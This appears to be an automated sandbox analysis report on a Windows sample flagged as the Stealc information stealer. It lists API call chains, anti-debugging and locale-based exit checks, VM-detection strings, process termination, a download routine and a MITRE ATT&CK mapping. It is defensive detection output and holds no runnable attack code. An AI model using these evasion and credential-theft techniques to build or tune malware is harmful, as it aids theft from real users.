Code function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419F20

Source: kNp6KbvVoz.exe

Static PE information: section name: .pewume

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0042A378 push eax; retf	0_2_0042A39D
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0041B335 push ecx; ret	0_2_0041B348
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048DB59C push ecx; ret	0_2_048DB5AF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_04949280 push ecx; ret	0_2_04949293

Source: kNp6KbvVoz.exe

Static PE information: section name: .text entropy: 7.843773564734436

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

0_2_00419F20

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-44742

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

API coverage: 9.5 %

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_048CE797
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_048CF087
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_048CC0A7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048CE177
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D4357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_048D4357
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D4DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048D4DC7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_048CDDE7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D3D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_048D3D67
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048C1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048C1977
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048CFA17
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D4A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_048D4A27

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00418060 GetSystemInfo,wsprintfA,

0_2_00418060

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW s
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareR
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44727
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44730
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-45905
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44749
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44569
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44770
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44748
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	API call chain: ExitProcess graph end node	graph_0-44741

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041B058

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

0_2_00419F20

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]	0_2_00419AA0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_02E39F83 push dword ptr fs:[00000030h]	0_2_02E39F83
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048C0D90 mov eax, dword ptr fs:[00000030h]	0_2_048C0D90
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D9D07 mov eax, dword ptr fs:[00000030h]	0_2_048D9D07
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048C092B mov eax, dword ptr fs:[00000030h]	0_2_048C092B

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041B058
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0041D21A SetUnhandledExceptionFilter,	0_2_0041D21A
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B63A
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048DD481 SetUnhandledExceptionFilter,	0_2_048DD481
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048DB2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_048DB2BF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048DB8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_048DB8A1

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: kNp6KbvVoz.exe PID: 6920, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,	0_2_004198E0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_00419790
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D99F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_048D99F7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D9B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,	0_2_048D9B47

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_049069EF cpuid

0_2_049069EF

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00417D20
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_048D7F87

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00418CF0 GetSystemTime,

0_2_00418CF0

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004179E0

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417BC0

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kNp6KbvVoz.exe.49a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kNp6KbvVoz.exe.49a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.48c0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.48c0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kNp6KbvVoz.exe PID: 6920, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kNp6KbvVoz.exe.49a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kNp6KbvVoz.exe.49a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.48c0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kNp6KbvVoz.exe.48c0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kNp6KbvVoz.exe PID: 6920, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 Create Account	11 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
